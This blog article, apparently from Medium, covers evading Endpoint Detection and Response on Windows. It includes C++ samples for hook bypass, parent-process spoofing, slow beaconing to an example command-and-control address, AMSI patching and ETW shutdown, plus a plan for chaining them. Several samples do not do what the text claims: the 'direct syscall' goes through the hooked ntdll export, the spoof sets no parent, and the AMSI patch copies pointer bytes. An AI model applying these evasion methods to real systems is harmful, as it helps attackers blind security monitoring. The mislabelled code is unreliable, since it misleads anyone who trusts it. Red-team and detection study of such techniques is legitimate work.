Evading Endpoint Detection and Response (EDR)

Kai Aizen
7 min read5 days ago

--

Endpoint Detection and Response (EDR) solutions have become indispensable in modern cybersecurity strategies. By gathering extensive telemetry at the host level — such as processes spawned, registry changes, and network connections — EDRs empower security teams to quickly detect and respond to threats. However, no system is foolproof.

As attackers and red teams aim to stay unnoticed, they’ve mastered a broad spectrum of evasion techniques that exploit design gaps, user-mode and kernel-mode hooking limitations, and even advanced OS security features like AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows). This guide walks you through:

  • Windows core files that EDRs rely on for monitoring.
  • Key elements of EDR architecture and how detection decisions are made.
  • Hands-on evasion methods, complete with sample code for educational and ethical use.
  • Defensive strategies to detect, mitigate, or outright prevent these bypass tactics.
  • Emerging trends in EDR and possible future vectors of evasion.

Whether you’re a red team professional, a security analyst, or just curious about how adversaries outsmart defenses, this article will equip you with in-depth insights.

Key Windows Core Files in EDR Monitoring

EDRs rely on tapping into specific Windows components that handle process management, memory allocation, and security. Here are the usual focal points:

ntdll.dll

  • Function: Serves as the translator between user-mode apps and the Windows kernel, handling low-level system calls like NtCreateProcess, NtAllocateVirtualMemory, etc.
  • Relevance: EDR hooks or monitors these calls to detect suspicious operations (e.g., injection). If attackers bypass hooking in ntdll.dll, the EDR may lose visibility.

kernel32.dll

  • Function: Offers a higher-level API for Windows operations (e.g., process/thread creation, file I/O).
  • Relevance: Hooking or scanning calls within kernel32.dll helps EDRs link malicious file writes, suspicious process spawns, and so on.

advapi32.dll

  • Function: Central to Windows security (managing the registry, services, user privileges).
  • Relevance: Attackers often target advapi32.dll for privilege escalation or registry-based persistence. EDRs monitor these interactions to spot tampering.

ntoskrnl.exe (Windows Kernel)

  • Function: The kernel orchestrates system resources, memory, and device drivers.
  • Relevance: Many advanced EDRs place hooks or filters at the kernel level. Kernel exploits or rootkits strive to modify ntoskrnl.exe structures to dodge EDR alerts.

win32k.sys

  • Function: Manages user-mode interactions with the GUI, handling graphics rendering and I/O.
  • Relevance: Attackers can hide malicious processes or circumvent user-mode monitors by manipulating calls within win32k.sys.
windows core files typical abuses

EDR Architecture & Detection Strategies

Most EDR solutions have several moving parts:

Agent on the Endpoint

  • Local Sensors: These often include user-mode hooks (DLL function hooking) and kernel-mode drivers (like minifilter drivers) to watch for suspicious events.
  • Initial Detection: Some checks and blocks happen instantly on the endpoint — like known hash detection or simple behavior rules (e.g., an unexpected process writing to lsass.exe).

Centralized Analysis

  • Telemetry Aggregation: The agent ships logs and event data to a central console or cloud service.
  • Advanced Detection Logic: Correlates patterns across multiple endpoints, uses machine learning or heuristics, and references threat intelligence feeds.

Response & Investigation

  • Automatic Containment: If certain rules trigger, the EDR can kill processes, isolate the endpoint, or quarantine binaries.
  • Forensics: Security analysts can retrieve memory captures, timelines, and event histories to piece together how an attacker gained a foothold.

Practical EDR Bypassing Techniques

Now, let’s discuss strategies for evading EDR detection. Important: These examples and snippets are intended solely for ethical and authorized testing in environments where you have explicit permission.

Function Hooking Bypass with Direct System Calls

The Challenge: EDR hooks user-mode APIs in DLLs like ntdll.dll or kernel32.dll.
The Trick: Directly issue syscalls, bypassing the user-mode stubs. EDR hooking often lives in user-mode functions, but direct syscalls go straight to the kernel.

#include <Windows.h>
#include <iostream>
typedef NTSTATUS (WINAPI* pNtAllocateVirtualMemory)(
HANDLE, PVOID*, ULONG, PULONG, ULONG, ULONG
);
int main() {
// Obtain pointer to NtAllocateVirtualMemory (system call)
HMODULE hNtDll = GetModuleHandle(L"ntdll.dll");
pNtAllocateVirtualMemory NtAllocateMemory =
(pNtAllocateVirtualMemory)GetProcAddress(hNtDll, "NtAllocateVirtualMemory");
PVOID pMemory = NULL;
ULONG size = 0x2000; // 8 KB
NTSTATUS status = NtAllocateMemory(GetCurrentProcess(), &pMemory, 0, &size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (status == 0) {
std::cout << "[+] Memory allocated via direct syscall (hook bypass)." << std::endl;
}
return 0;
}

Process Creation and Thread Monitoring Evasion

EDRs watch for suspicious child processes (e.g., powershell.exe spawned by winword.exe).
The Trick: Spoof your parent process ID (PPID) or mutate command lines so the real origin is blurred.Some detection logic heavily relies on “If parent is X, check child’s process name.” Spoofing can trick these rules.

#include <Windows.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetParentPID(DWORD pid) {
PROCESSENTRY32 pe32;
HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(snap, &pe32)) {
do {
if (pe32.th32ProcessID == pid) {
CloseHandle(snap);
return pe32.th32ParentProcessID;
}
} while (Process32Next(snap, &pe32));
}
CloseHandle(snap);
return 0;
}
void SpoofParentAndSpawn() {
DWORD currentPID = GetCurrentProcessId();
DWORD parentPID = GetParentPID(currentPID);
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi;

// Launch "malicious.exe" but mimic a trusted parent relationship
if (CreateProcess(L"malicious.exe", NULL, NULL, NULL, FALSE,
CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
std::cout << "[+] New process spawned with a spoofed parent PID!" << std::endl;
}
}
int main() {
SpoofParentAndSpawn();
return 0;
}

Network Traffic Evasion Techniques

EDR and network monitoring solutions track unusual outbound traffic, especially if it’s frequent or connects to shady domains.
The Trick: Use slow beaconing, domain fronting, or recognized ports/protocols (like HTTPS on port 443) to blend in with normal enterprise traffic.
Security teams often rely on detection rules for rapid or large-scale exfil.
A slow drip can escape these triggers.

#include <WinSock2.h>
#include <iostream>
#pragma comment(lib, "ws2_32.lib")
void SlowBeacon() {
WSADATA wsaData;
WSAStartup(MAKEWORD(2,2), &wsaData);
SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
sockaddr_in srv = {0};
srv.sin_family = AF_INET;
srv.sin_port = htons(443); // Common HTTPS port
srv.sin_addr.s_addr = inet_addr("203.0.113.5"); // Example C2
connect(s, (sockaddr*)&srv, sizeof(srv));
// Send periodic "beacons"
while(true) {
send(s, "HELLO", 5, 0);
Sleep(120000); // 2 minutes between calls
}
closesocket(s);
WSACleanup();
}
int main() {
SlowBeacon();
return 0;
}

AMSI Bypass Techniques

AMSI scans scripts (PowerShell, VBScript, etc.) and memory buffers for malicious signatures.
The Trick: Patch amsi.dll in memory or alter how scripts are presented (obfuscation).Once patched, AMSI’s detection routine always reports content as harmless.

#include <Windows.h>
#include <psapi.h>
#include <iostream>
typedef HRESULT (WINAPI *AmsiScanBuffer_t)(PVOID, ULONG, LPCWSTR, PVOID);
AmsiScanBuffer_t origAmsiScanBuffer = NULL;
HRESULT WINAPI HookedAmsiScanBuffer(PVOID buffer, ULONG length,
LPCWSTR contentName, PVOID context) {
// Always say "Safe!"
return S_OK;
}
void PatchAMSI() {
HMODULE amsiDLL = GetModuleHandle(L"amsi.dll");
if (!amsiDLL) {
std::cout << "[-] amsi.dll not found." << std::endl;
return;
}
origAmsiScanBuffer = (AmsiScanBuffer_t)GetProcAddress(amsiDLL, "AmsiScanBuffer");
if (!origAmsiScanBuffer) {
std::cout << "[-] AmsiScanBuffer not found." << std::endl;
return;
}
DWORD oldProtect;
VirtualProtect(origAmsiScanBuffer, 8, PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(origAmsiScanBuffer, &HookedAmsiScanBuffer, 8);
VirtualProtect(origAmsiScanBuffer, 8, oldProtect, &oldProtect);
std::cout << "[+] AMSI patched successfully." << std::endl;
}
int main() {
PatchAMSI();
// Any AMSI-based scanning now returns clean
return 0;

Event Tracing for Windows (ETW) Evasion

The Challenge: EDRs rely on ETW for real-time logging of process events, file I/O, registry actions, and more.
The Trick: Disable or spoof ETW providers so the EDR sees nothing. If the EDR depends solely on that ETW feed, cutting it off blinds the solution to local events.

#include <Windows.h>
#include <evntrace.h>
#include <iostream>
void DisableETWProvider() {
EVENT_TRACE_PROPERTIES props = {0};
props.Wnode.BufferSize = sizeof(props);
// Attempt to stop a known ETW provider
ULONG status = StopTraceW(NULL, L"MyProvider", &props);
if (status == ERROR_SUCCESS) {
std::cout << "[+] ETW provider stopped successfully." << std::endl;
} else {
std::cout << "[-] Failed to stop ETW provider. Error code: " << status << std::endl;
}
}
int main() {
DisableETWProvider();
return 0;
}

Combining Multiple Evasion Methods

IRL attackers will often chain these tactics:

  1. Obfuscate initial PowerShell script (bypassing AMSI).
  2. Use direct syscalls for injection (bypassing user-mode hooks).
  3. Spoof parent process for stealth.
  4. Disable ETW if possible for deeper cover.
  5. Slowly beacon to a remote server, riding normal HTTPS traffic.

This synergy can degrade EDR visibility from multiple angles, resembling real-world advanced persistent threat (APT) behavior.

References and MITRE ATT&CK Mapping

  • T1055 — Process Injection: Methods like direct syscalls, DLL injection, hooking bypasses.
  • T1562.001 — Disable or Modify Tools (AMSI/ETW): Techniques for neutralizing built-in detection features.
  • T1027 — Obfuscated Files or Information: Encoded or encrypted scripts, staging to avoid scanning.
  • T1599 — Network Boundary Bridging: Evasion over well-known ports or domain fronting.

Additional Resources

  • Microsoft Detours — A commonly cited hooking library demonstrating how user-mode API hooking works.
  • Sysinternals Suite — Tools like Sysmon and Process Monitor can reveal hooking or injection artifacts.
  • Volatility / Rekall — Memory forensic frameworks for deeper offline analysis.

To Sum it up

While EDR systems represent a significant leap forward in endpoint security, determined attackers — equipped with sufficient knowledge of Windows internals — can still evade detection. From direct syscalls that circumvent user-mode hooks to AMSI or ETW tampering, these techniques exploit blind spots in how EDR solutions monitor system activity.

For red teams, these tactics provide a realistic model of advanced adversaries. Embracing them in controlled scenarios helps identify genuine gaps and push defenses to improve. For blue teams, knowing these methods firsthand fosters a proactive mindset — watching for anomalies, layering detection sources, and ensuring the EDR is configured to catch subtle signals an attacker might leave behind.

Ultimately, collaboration between offensive and defensive teams is the engine of progress in this cat-and-mouse game. By continually evolving detection strategies, harnessing multi-source telemetry, and rigorously testing in red-team exercises, organizations can significantly reduce the success window for adversaries. Remember: the first step to defeating any tactic is understanding it — and hopefully, this guide shines a light on the many facets of EDR evasion.

About the Author

Kai Aizen, a cybersecurity researcher and red team expert, explores the intersection of AI vulnerabilities and adversarial techniques. As part of the PTSnails team, Kai conducts cutting-edge research into the risks and challenges of AI-driven systems.

--

--

Kai Aizen
Kai Aizen

Written by Kai Aizen

I'm a Cybersecurity Specialist focusing on red teaming, AI, and innovation, blending expertise and creativity to explore the latest Cyber Tech Trends.

No responses yet